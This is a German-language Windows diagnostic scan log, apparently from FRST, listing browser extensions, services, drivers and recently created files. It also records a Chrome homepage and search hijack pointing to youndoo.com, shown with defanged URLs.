Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-21]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-21 21:01 - 2017-05-21 21:01 - 00263448 ____N (Kaspersky Lab, Yury Parshin) C:\WINDOWS\system32\Drivers\95389174.sys
2017-05-21 21:00 - 2017-05-21 21:02 - 00285270 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:56 - 2017-05-21 20:56 - 00000000 ___HD C:\OneDriveTemp
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-21 21:04 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
